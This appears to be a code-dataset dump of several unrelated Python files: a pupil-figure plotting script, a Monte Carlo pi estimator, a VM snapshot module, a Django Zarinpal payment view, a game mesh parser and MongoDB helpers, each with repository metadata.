pval_y = -0.1 * ylim[1]
pval_ord = np.trunc(np.log10(pv)).astype(int)
hatch_between(ax, 9, t[clu], cluster_ymin,
cluster_ymax, linewidth=1.25,
color=signifcol, zorder=1)
if show_pval:
pval_txt = '$p < 10^{{{}}}$'.format(pval_ord)
ax.text(pval_x, pval_y, pval_txt, ha='center',
va='baseline', fontdict=dict(size=10))
# vertical lines
if len(signif):
for ix in (0, -1):
ax.plot((t[clu][ix], t[clu][ix]),
(cluster_ymin[ix], cluster_ymax[ix]),
linestyle=':', color=axiscol, linewidth=1)
# set axis limits
xlim[1] = 1.001 * xlim[1]
ylim[1] = 1.001 * ylim[1]
ax.set_ylim(*ylim)
ax.set_xlim(*xlim)
ax.xaxis.set_ticks(np.arange(np.ceil(xlim[1])))
# remove yaxis / ticks / ticklabels near bottom
ytck = [-0.1 * ymax, 1.001 * ymax]
ytl = ax.yaxis.get_ticklocs()
ax.spines['left'].set_bounds(*ytck)
for sp in ['left', 'bottom']:
ax.spines[sp].set_color(axiscol)
ax.yaxis.set_ticks(ytl[ytl > ytck[0]])
ax.set_ylim(*ylim) # have to do this twice
ax.tick_params(color=tickcol, width=0.5, labelcolor=ticklabcol)
# annotations
yl = u'“Effort” (a.u.)' if use_deconv else 'Pupil size (z-score)'
yo = 1 - np.diff(ytck) / np.diff(ylim) / 2.
ax.set_ylabel(yl, y=yo, color=axislabcol)
ax.set_xlabel('Time (s)', color=axislabcol)
box_off(ax, ax_linewidth=0.5)
ax.patch.set_facecolor('none')
# fig.tight_layout(w_pad=2., rect=(0.02, 0, 1, 1))
fig.tight_layout()
fig.text(0.01, 0.98, 'a)')
fig.text(0.01, 0.66, 'b)')
fig.text(0.01, 0.34, 'c)')
if savefig:
fig.savefig('pupil-fig-voc{}.pdf'.format(perfect_filename))
else:
plt.ion()
plt.show()
if only_perfect:
df = DataFrame.from_dict(n_perfect_trials, orient='index')
df.to_csv(op.join(out_dir, 'voc_perfect_trials.csv'))
| LABSN-pubs/2017-JASA-pupil-attn-switch | figures/fig-pupil-voc.py | fig-pupil-voc.py | py | 14,529 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.ioff",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "convenience_functions.use_font",
"line_number": 27,
"usage_type": "call"
},
{
"api_name"... |
71534618024 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
from random import *
import math
def get_random_coordinates():
return random(), random()
def draw_circle():
center = (0, 0)
radius = 1
circle = plt.Circle(center, radius, fill=False, ec='b')
a = plt.axes(xlim=(-1.2, 1.2), ylim=(-1.2, 1.2))
a.add_patch(circle)
a.set_aspect('equal')
plt.grid(True)
def main():
data = []
gen_cnt = 100000
inside_cnt = 0
for i in range(gen_cnt):
x, y = get_random_coordinates()
data.append((x, y))
xy_pow_sum = math.pow(x, 2) + math.pow(y, 2)
if xy_pow_sum <= 1:
inside_cnt += 1
xs, ys = zip(*data)
draw_circle()
plt.scatter(xs, ys)
plt.grid(True)
plt.show()
print("Div: {} (Expected: {})".format(str(inside_cnt/gen_cnt), math.pi/4))
if __name__ == '__main__':
main()
| Dry8r3aD/monteCarloSimulation | run.py | run.py | py | 912 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.Circle",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.axes",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "mat... |
6663058248 | import os
from datetime import datetime
from univention.lib.i18n import Translation
from univention.management.console.config import ucr
from univention.management.console.modules import Base, UMC_OptionTypeError, UMC_OptionMissing, UMC_CommandError
from univention.management.console.log import MODULE
from univention.management.console.protocol.definitions import MODULE_ERR_COMMAND_FAILED
from univention.uvmm.protocol import Data_Domain, Disk, Graphic, Interface
# for urlparse extensions
from univention.uvmm import helpers
import urlparse
from notifier import Callback
_ = Translation( 'univention-management-console-modules-uvmm' ).translate
class Snapshots( object ):
def snapshot_query( self, request ):
"""Returns a list of snapshots of a domain
options: { 'domainURI': <domain URI> }
return: [ { 'id' : <snapshot name>, 'label' : <snapshot name>, 'time' : <creation time> }, ... ]
"""
self.required_options( request, 'domainURI' )
def _finished( thread, result, request ):
if self._check_thread_error( thread, result, request ):
return
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
success, data = result
if success:
snapshot_list = []
if success and data.snapshots is not None:
for name, info in data.snapshots.items():
creation = datetime.fromtimestamp( info.ctime )
snapshot = { 'id' : name, 'label' : name, 'time' : creation.strftime( "%x %X" ) }
snapshot_list.append( snapshot )
self.finished( request.id, snapshot_list )
else:
self.finished( request.id, None, message = str( data ), status = MODULE_ERR_COMMAND_FAILED )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_INFO', Callback( _finished, request ), uri = node_uri, domain = domain_uuid )
def snapshot_create( self, request ):
"""Create a snapshot for a domain
options: { 'domainURI': <domain URI>. 'snapshotName' : <snapshot name> }
return: { 'success' : (True|False), 'data' : <details> }
"""
self.required_options( request, 'domainURI', 'snapshotName' )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_SNAPSHOT_CREATE', Callback( self._thread_finish, request ), uri = node_uri, domain = domain_uuid, snapshot = request.options[ 'snapshotName' ] )
def snapshot_remove( self, request ):
"""Returns a list of snapshots of a domain
options: { 'domainURI': <domain URI>. 'name' : <snapshot name> }
return: { 'success' : (True|False), 'data' : <details> }
"""
self.required_options( request, 'domainURI', 'snapshotName' )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_SNAPSHOT_DELETE', Callback( self._thread_finish, request ), uri = node_uri, domain = domain_uuid, snapshot = request.options[ 'snapshotName' ] )
def snapshot_revert( self, request ):
"""Returns a list of snapshots of a domain
options: { 'domainURI': <domain URI>. 'snapshotName' : <snapshot name> }
return:
"""
self.required_options( request, 'domainURI', 'snapshotName' )
node_uri, domain_uuid = urlparse.urldefrag( request.options[ 'domainURI' ] )
self.uvmm.send( 'DOMAIN_SNAPSHOT_REVERT', Callback( self._thread_finish, request ), uri = node_uri, domain = domain_uuid, snapshot = request.options[ 'snapshotName' ] )
| m-narayan/smart | ucs/virtualization/univention-virtual-machine-manager-daemon/umc/python/uvmm/snapshots.py | snapshots.py | py | 3,398 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "univention.lib.i18n.Translation",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "urlparse.urldefrag",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.fromtimestamp",
"line_number": 41,
"usage_type": "call"
},
{
... |
36815991792 | from decouple import config
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import redirect, render, get_object_or_404
from zeep import Client
from extensions.utils import send_message_api
from home.models import Setting
from order.models import Order
MERCHANT = config('MERCHANT')
client = Client('https://www.zarinpal.com/pg/services/WebGate/wsdl')
amount = 100 # Toman / Required
orderId = 0
description = "توضیحات مربوط به تراکنش را در این قسمت وارد کنید" # Required
email = 'email@example.com' # Optional
mobile = '09022021302' # Optional
CallbackURL = 'http://127.0.0.1:8000/verify/' # Important: need to edit for realy server.
def send_request(request, id):
global orderId
orderId = id
result = client.service.PaymentRequest(MERCHANT, amount, description, email, mobile, CallbackURL)
print(result.Status)
if result.Status == 100:
order = get_object_or_404(Order, id=orderId, user=request.user)
if order.status != "OnPay":
raise Http404("سفارش شما منقضی شده است. لطفا مجدد سبد خرید را ثبت کنید.")
send_message_api(order.phone,
"سفارش " + str(
order.code) + " در وضعیت پرداخت قرار گرفت لطفا از طریق درگاه بانک خرید خود را تکمیل کنید." + "\n مبلغ سفارش: " + '{:7,.0f}'.format(
order.total) + " تومان")
return HttpResponseRedirect('https://www.zarinpal.com/pg/StartPay/' + str(result.Authority))
else:
return HttpResponse('Error code: ' + str(result.Status))
def verify(request):
if request.GET.get('Status') == 'OK':
order = get_object_or_404(Order, id=orderId, user=request.user)
order.status = "New"
order.save()
result = client.service.PaymentVerification(MERCHANT, request.GET['Authority'], amount)
if result.Status == 100:
messages.success(request,
"\nسفارش شما ثبت شد." + "سریال پرداخت:\n " + str(result.RefID) + "شماره سفارش:\n " + str(
order.code))
send_message_api(order.phone,
"سفارش شما ثبت شد." + " سریال پرداخت:\n " + str(result.RefID) + "شماره سفارش:\n " + str(
order.code))
if Setting.objects.exists(): # send message to admin for new order
setting = Setting.objects.get(pk=1)
send_message_api(setting.phone,
"سفارش جدیدی ثبت شد." + " سریال پرداخت:\n " + str(
result.RefID) + "شماره سفارش:\n " + str(
order.code))
context = {'order': order, 'ref_id': result.RefID}
return render(request, 'order_completed.html', context)
elif result.Status == 101:
messages.error(request,
"\nخطا در پرداخت سفارش." + "کد خطا:\n " + str(result.Status) + "شماره سفارش:\n " + str(
order.code) + "\nاز بخش سفارشات مجدد پرداخت را انجام دهید.")
context = {'order': order,
'ref_id': "خطایی در پرداخت پیش آمده است. لطفا مجدد از بخش سفارشات فاکتور ایجاد شده را پرداخت نمایید."}
return render(request, 'order_completed.html', context)
else:
messages.error(request,
"\nخطا در پرداخت سفارش." + "کد خطا:\n " + str(result.Status) + "شماره سفارش:\n " + str(
order.code) + "\nاز بخش سفارشات مجدد پرداخت را انجام دهید.")
context = {'order': order,
'ref_id': "خطایی در پرداخت پیش آمده است. لطفا مجدد از بخش سفارشات فاکتور ایجاد شده را پرداخت نمایید."}
return render(request, 'order_completed.html', context)
# return HttpResponse('Transaction failed.\nStatus: ' + str(result.Status))
else:
messages.error(request,
"\nخطا در پرداخت سفارش." + "\nاز بخش سفارشات مجدد پرداخت را انجام دهید.")
context = {
'ref_id': "خطایی در پرداخت پیش آمده است. لطفا مجدد از بخش سفارشات فاکتور ایجاد شده را پرداخت نمایید."}
return render(request, 'order_completed.html', context)
# return HttpResponse('Transaction failed or canceled by user')
| amirmovafagh/ecommerce-project-django | payment/views.py | views.py | py | 5,014 | python | fa | code | 0 | github-code | 36 | [
{
"api_name": "decouple.config",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "zeep.Client",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "order.models",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "django.shortcuts.get_object_... |
18507806058 | """This module store everything connected to a sigular mesh"""
import struct
from typing import BinaryIO
from .offsetstable import OffsetsTable
from .filehelper import FileHelper
class Mesh: # 1_83:
"""A singular mesh"""
# pylint: disable=too-many-instance-attributes,too-many-arguments,too-many-locals
def __init__(
self,
uk: int = 0,
uk2: int = 0,
uk3: int = 0,
uk4: int = 0,
transform_index: int = 0,
uk5: int = 0,
uk6: int = 0,
uk7: int = 0,
uk8: int = 0,
uk9: int = 0,
uk10: int = 0,
weight: float = 0,
uk_index: int = 0,
uk_index2: int = 0,
polys_count: int = 0,
uvs_count: int = 0,
verts_count: int = 0,
uvs_start_index: int = 0,
verts_start_index: int = 0,
polys_start_index: int = 0,
uk11: int = 0,
uk12: int = 0,
):
self.unknown: int = uk
self.unknown2: int = uk2
self.unknown3: int = uk3
self.unknown4: int = uk4
self.transform_index: int = transform_index
self.unknown5: int = uk5
self.unknown6: int = uk6
self.unknown7: int = uk7
self.unknown8: int = uk8
self.unknown9: int = uk9
self.unknown10: int = uk10
self.weight: float = weight
self.uk_index: int = uk_index
self.uk_index2: int = uk_index2
self.polys_count: int = polys_count
self.uvs_count: int = uvs_count
self.verts_count: int = verts_count
self.uvs_start_index: int = uvs_start_index
self.verts_start_index: int = verts_start_index
self.polys_start_index: int = polys_start_index
self.unknown11: int = uk11
self.unknown12: int = uk12
def is_empty(self) -> bool:
if (self.uvs_count == 0) or (self.polys_count == 0) or (self.verts_count == 0):
return True
return False
@staticmethod
def parse_mesh_1_60(
pmd_file: BinaryIO,
offsets_table: OffsetsTable,
table_index: int,
mesh_index: int,
) -> "Mesh":
current_cursor = pmd_file.tell()
pmd_file.seek(offsets_table[table_index].offset + (0x2C * mesh_index) + 0x4)
ti = FileHelper.read_ushort(pmd_file)
pmd_file.seek(offsets_table[table_index].offset + (0x2C * mesh_index) + 0x18)
uvc, vc, pc, uvi, vi, pi = struct.unpack("<2H4L", pmd_file.read(0x14))
mesh = Mesh(
transform_index=ti,
uvs_count=uvc,
verts_count=vc,
polys_count=pc,
uvs_start_index=uvi,
verts_start_index=vi,
polys_start_index=pi,
)
pmd_file.seek(current_cursor)
return mesh
@staticmethod
def parse_mesh_1_82(
pmd_file: BinaryIO,
offsets_table: OffsetsTable,
table_index: int,
mesh_index: int,
) -> "Mesh":
current_cursor = pmd_file.tell()
raise Exception("Unimplemented mesh")
pmd_file.seek(current_cursor)
pass
@staticmethod
def parse_mesh_1_83(
pmd_file: BinaryIO,
offsets_table: OffsetsTable,
table_index: int,
mesh_index: int,
) -> "Mesh":
current_cursor = pmd_file.tell()
pmd_file.seek(offsets_table[table_index].offset + (0x40 * mesh_index))
mesh_data = struct.unpack("<8H3Lf4H6L", pmd_file.read(0x40))
mesh = Mesh(*mesh_data)
pmd_file.seek(current_cursor)
return mesh
@staticmethod
def parse_meshes_1_60(
pmd_file: BinaryIO, offsets_table: OffsetsTable, table_index: int
) -> list["Mesh"]:
meshes: list["Mesh"] = []
meshes_count = int(offsets_table[table_index].size / 44)
for i in range(meshes_count):
meshes.append(Mesh.parse_mesh_1_60(pmd_file, offsets_table, table_index, i))
return meshes
@staticmethod
def parse_meshes_1_82(
pmd_file: BinaryIO, offsets_table: OffsetsTable, table_index: int
) -> list["Mesh"]:
meshes: list["Mesh"] = []
meshes_count = int(offsets_table[table_index].size / 60)
for i in range(meshes_count):
meshes.append(Mesh.parse_mesh_1_82(pmd_file, offsets_table, table_index, i))
return meshes
@staticmethod
def parse_meshes_1_83(
pmd_file: BinaryIO, offsets_table: OffsetsTable, table_index: int
) -> list["Mesh"]:
meshes: list["Mesh"] = []
meshes_count = int(offsets_table[table_index].size / 64)
for i in range(meshes_count):
meshes.append(Mesh.parse_mesh_1_83(pmd_file, offsets_table, table_index, i))
return meshes
| stuntkit/stunt_gp_blender | io_scene_pmd/stunt_gp_model/mesh.py | mesh.py | py | 4,722 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.BinaryIO",
"line_number": 69,
"usage_type": "name"
},
{
"api_name": "offsetstable.OffsetsTable",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "filehelper.FileHelper.read_ushort",
"line_number": 77,
"usage_type": "call"
},
{
"api_n... |
624223444 | from pymongo import MongoClient
from dotenv import dotenv_values
import urllib.parse
config = dotenv_values(".env")
mongodb_client = MongoClient(config["ATLAS_URI"])
mongo_database = mongodb_client[config["DB_NAME"]]
print(f">>>> Connected to the {config['DB_NAME']} database!")
items_collection = mongo_database[config['DB_COLLECTION']]
terms_collection = mongo_database[config['DB_TERMS_COLLECTION']]
terms_collection.insert_one({'terms': dict()})
def item_helper(item) -> dict:
return {
"id": str(item["_id"]),
"product_name": item["product_name"],
"price": item["price"],
"location": item["location"],
"listed_date": item["listed_date"],
"product_link": item["product_link"],
"product_image": item["product_image"],
"product_search_term": item["product_search_term"]
}
# Retrieve all items present in the database
async def retrieve_items(search_term: str) -> list:
items = []
for item in items_collection.find({'product_search_term': search_term}):
items.append(item_helper(item))
return items
# Add a new item into to the database
async def add_items(items_data: list, search_term: str) -> list:
items = items_collection.insert_many(items_data)
new_items = await retrieve_items(search_term)
return new_items
# Add a new search term into to the database
async def add_search_term(search_term_data: dict) -> dict:
term = terms_collection.update_one(terms_collection.find_one({}),{"$set":{"terms": {**terms_collection.find_one({})['terms'], **search_term_data}}})
return True
| ahmeds26/Evas-Task | server/database.py | database.py | py | 1,628 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.dotenv_values",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pymongo.MongoClient",
"line_number": 10,
"usage_type": "call"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.